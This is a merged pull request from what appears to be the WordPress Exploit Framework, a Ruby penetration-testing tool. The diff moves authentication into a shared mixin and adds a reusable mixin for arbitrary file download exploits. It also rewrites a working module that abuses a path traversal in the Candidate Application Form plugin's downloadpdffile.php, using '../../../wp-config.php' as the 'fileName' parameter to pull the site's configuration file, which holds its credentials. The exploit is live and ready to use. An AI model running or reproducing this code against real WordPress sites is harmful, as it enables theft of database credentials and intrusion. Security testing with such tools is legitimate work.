Merge pull request #12 from rastating/file_download_mixin

File download mixin

Author: rastating

lib/wpxf/core.rb

@@ -6,6 +6,7 @@
 require 'wpxf/core/event_emitter'
 require 'wpxf/core/output_emitters'
 require 'wpxf/core/module_info'
+require 'wpxf/core/module_authentication'
 
 require 'wpxf/versioning/browser_versions'
 require 'wpxf/versioning/os_versions'
@@ -29,5 +30,6 @@
 require 'wpxf/wordpress/reflected_xss'
 require 'wpxf/wordpress/staged_reflected_xss'
 require 'wpxf/wordpress/shell_upload'
+require 'wpxf/wordpress/file_download'
 
 require 'wpxf/core/module'

lib/wpxf/core/module.rb

@@ -9,6 +9,7 @@ class Module
     include Wpxf::WordPress::Login
     include Wpxf::WordPress::Options
     include Wpxf::WordPress::Urls
+    include Wpxf::ModuleAuthentication
 
     def initialize
       super
@@ -73,11 +74,8 @@ def set_option_value(name, value)
       res = super(name, value)
 
       if payload
-        if res == :not_found
-          return payload.set_option_value(name, value)
-        else
-          payload.set_option_value(name, value)
-        end
+        return payload.set_option_value(name, value) if res == :not_found
+        payload.set_option_value(name, value)
       end
 
       res
@@ -90,28 +88,16 @@ def unset_option(name)
       payload.unset_option(name) if payload
     end
 
-    # Authenticate with WordPress and return the cookie.
-    # @param username [String] the username to authenticate with.
-    # @param password [String] the password to authenticate with.
-    # @return [CookieJar, Boolean] the cookie in a CookieJar if successful,
-    #   otherwise, returns false.
-    def authenticate_with_wordpress(username, password)
-      emit_info "Authenticating with WordPress using #{username}:#{password}..."
-      cookie = wordpress_login(username, password)
-      if cookie.nil?
-        emit_error 'Failed to authenticate with WordPress'
-        return false
-      else
-        emit_success 'Authenticated with WordPress', true
-        return cookie
-      end
-    end
-
     # Run the module.
     # @return [Boolean] true if successful.
     def run
       if normalized_option_value('check_wordpress_and_online')
-        return check_wordpress_and_online
+        return false unless check_wordpress_and_online
+      end
+
+      if requires_authentication
+        @session_cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
+        return false unless @session_cookie
       end
 
       true
@@ -143,5 +129,8 @@ def exploit_module?
 
     # @return [EventEmitter] the {EventEmitter} for the module's events.
     attr_accessor :event_emitter
+
+    # @return [String, nil] the current session cookie, if authenticated with the target.
+    attr_reader :session_cookie
   end
 end

lib/wpxf/core/module_authentication.rb

@@ -0,0 +1,45 @@
+module Wpxf
+  # Provides functionality for authenticating modules with a WordPress target.
+  module ModuleAuthentication
+    def initialize
+      super
+
+      if requires_authentication
+        register_options([
+          StringOption.new(
+            name: 'username',
+            desc: 'The WordPress username to authenticate with',
+            required: true
+          ),
+          StringOption.new(
+            name: 'password',
+            desc: 'The WordPress password to authenticate with',
+            required: true
+          )
+        ])
+      end
+    end
+
+    # @return [Boolean] true if the module requires the user to authenticate.
+    def requires_authentication
+      false
+    end
+
+    # Authenticate with WordPress and return the cookie.
+    # @param username [String] the username to authenticate with.
+    # @param password [String] the password to authenticate with.
+    # @return [CookieJar, Boolean] the cookie in a CookieJar if successful,
+    #   otherwise, returns false.
+    def authenticate_with_wordpress(username, password)
+      emit_info "Authenticating with WordPress using #{username}:#{password}..."
+      cookie = wordpress_login(username, password)
+      if cookie.nil?
+        emit_error 'Failed to authenticate with WordPress'
+        return false
+      else
+        emit_success 'Authenticated with WordPress', true
+        return cookie
+      end
+    end
+  end
+end

lib/wpxf/wordpress/file_download.rb

@@ -0,0 +1,122 @@
+# Provides reusable functionality for file download modules.
+module Wpxf::WordPress::FileDownload
+  include Wpxf
+
+  # Initialize a new instance of {FileDownload}
+  def initialize
+    super
+    @info[:desc] = 'This module exploits a vulnerability which allows you to '\
+                   'download any arbitrary file accessible by the user the web server is running as.'
+
+    register_options([
+      StringOption.new(
+        name: 'remote_file',
+        desc: "The path to the remote file (relative to #{working_directory})",
+        required: true,
+        default: default_remote_file_path
+      ),
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The path to save the file to',
+        required: false
+      )
+    ])
+  end
+
+  # @return [String] the working directory of the vulnerable file.
+  def working_directory
+    nil
+  end
+
+  # @return [String] the default remote file path.
+  def default_remote_file_path
+    nil
+  end
+
+  # @return [String] the URL of the vulnerable file used to download remote files.
+  def downloader_url
+    nil
+  end
+
+  # @return [Hash] the params to be used when requesting the download file.
+  def download_request_params
+    nil
+  end
+
+  # @return [Hash, String] the body to be use when requesting the download file.
+  def download_request_body
+    nil
+  end
+
+  # @return [Symbol] the HTTP method to use when requesting the download file.
+  def download_request_method
+    :get
+  end
+
+  # @return [String] the path to the remote file.
+  def remote_file
+    normalized_option_value('remote_file')
+  end
+
+  # @return [String] the path to save the file to.
+  def export_path
+    normalized_option_value('export_path')
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    validate_implementation
+
+    return false unless super
+
+    res = request_file
+    return false unless validate_result(res)
+
+    if export_path.nil?
+      emit_success "Result: \n#{res.body}"
+    else
+      emit_success "Downlaoded file to #{export_path}"
+    end
+
+    true
+  end
+
+  private
+
+  def validate_implementation
+    raise 'A value must be specified for #working_directory' unless working_directory
+  end
+
+  def validate_result(res)
+    if res.nil? || res.timed_out?
+      emit_error 'Request timed out, try increasing the http_client_timeout'
+      return false
+    end
+
+    return true unless res.code != 200
+
+    emit_error "Server responded with code #{res.code}"
+    false
+  end
+
+  def core_request_opts
+    {
+      method: download_request_method,
+      url: downloader_url,
+      params: download_request_params,
+      body: download_request_body,
+      cookie: session_cookie
+    }
+  end
+
+  def request_file
+    if export_path.nil?
+      emit_info 'Requesting file...'
+      return execute_request(core_request_opts)
+    else
+      emit_info 'Downloading file...'
+      return download_file(core_request_opts.merge(local_filename: export_path))
+    end
+  end
+end

lib/wpxf/wordpress/shell_upload.rb

@@ -22,26 +22,6 @@ def initialize
         max: 256
       )
     ])
-
-    if requires_authentication
-      register_options([
-        StringOption.new(
-          name: 'username',
-          desc: 'The WordPress username to authenticate with',
-          required: true
-        ),
-        StringOption.new(
-          name: 'password',
-          desc: 'The WordPress password to authenticate with',
-          required: true
-        )
-      ])
-    end
-  end
-
-  # @return [Boolean] true if the module requires the user to authenticate.
-  def requires_authentication
-    false
   end
 
   # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the upload operation.
@@ -71,11 +51,6 @@ def uploaded_payload_location
   def run
     return false unless super
 
-    if requires_authentication
-      @session_cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
-      return false unless @session_cookie
-    end
-
     emit_info 'Preparing payload...'
     @payload_name = "#{Utility::Text.rand_alpha(payload_name_length)}.php"
     builder = payload_body_builder
@@ -93,11 +68,6 @@ def run
     true
   end
 
-  # @return [String, nil] the current session cookie, if authenticated with the target.
-  def session_cookie
-    @session_cookie
-  end
-
   private
 
   def payload_name_length

modules/auxiliary/candidate_application_form_arbitrary_file_download.rb

@@ -1,14 +1,11 @@
 class Wpxf::Auxiliary::CandidateApplicationFormArbitraryFileDownload < Wpxf::Module
-  include Wpxf
+  include Wpxf::WordPress::FileDownload
 
   def initialize
     super
 
     update_info(
       name: 'Candidate Application Form Arbitrary File Download',
-      desc: 'This module exploits a vulnerability in all versions of the '\
-            'Candidate Application Form plugin which allows you to download any '\
-            'arbitrary file accessible by the user the web server is running as.',
       author: [
         'Larry W. Cashdollar',             # Disclosure
         'Rob Carr <rob[at]rastating.com>'  # WPXF module
@@ -18,75 +15,25 @@ def initialize
       ],
       date: 'Aug 10 2015'
     )
-
-    register_options([
-      StringOption.new(
-        name: 'remote_file',
-        desc: 'The path to the remote file (relative to wp-content/uploads/candidate_application_form/)',
-        required: true,
-        default: '../../../wp-config.php'
-      ),
-      StringOption.new(
-        name: 'export_path',
-        desc: 'The file to save the file to',
-        required: false
-      )
-    ])
   end
 
   def check
     check_plugin_version_from_readme('candidate-application-form')
   end
 
-  def remote_file
-    normalized_option_value('remote_file')
+  def default_remote_file_path
+    '../../../wp-config.php'
   end
 
-  def export_path
-    normalized_option_value('export_path')
+  def working_directory
+    'wp-content/uploads/candidate_application_form/'
   end
 
   def downloader_url
     normalize_uri(wordpress_url_plugins, 'candidate-application-form', 'downloadpdffile.php')
   end
 
-  def run
-    return false unless super
-
-    res = nil
-
-    if export_path.nil?
-      emit_info 'Requesting file...'
-      res = execute_get_request(
-        url: downloader_url,
-        params: { 'fileName' => remote_file }
-      )
-    else
-      emit_info 'Downloading file...'
-      res = download_file(
-        url: downloader_url,
-        method: :get,
-        params: { 'fileName' => remote_file },
-        local_filename: export_path
-      )
-    end
-
-    if res.nil? || res.timed_out?
-      emit_error 'Request timed out, try increasing the http_client_timeout'
-      return false
-    end
-
-    if res.code != 200
-      emit_error "Server responded with code #{res.code}"
-      return false
-    end
-
-    if export_path.nil?
-      emit_success "Result: \n#{res.body}"
-    else
-      emit_success "Downlaoded file to #{export_path}"
-    end
-
-    return true
+  def download_request_params
+    { 'fileName' => remote_file, 'fileUrl' => Utility::Text.rand_alpha(5) }
   end
 end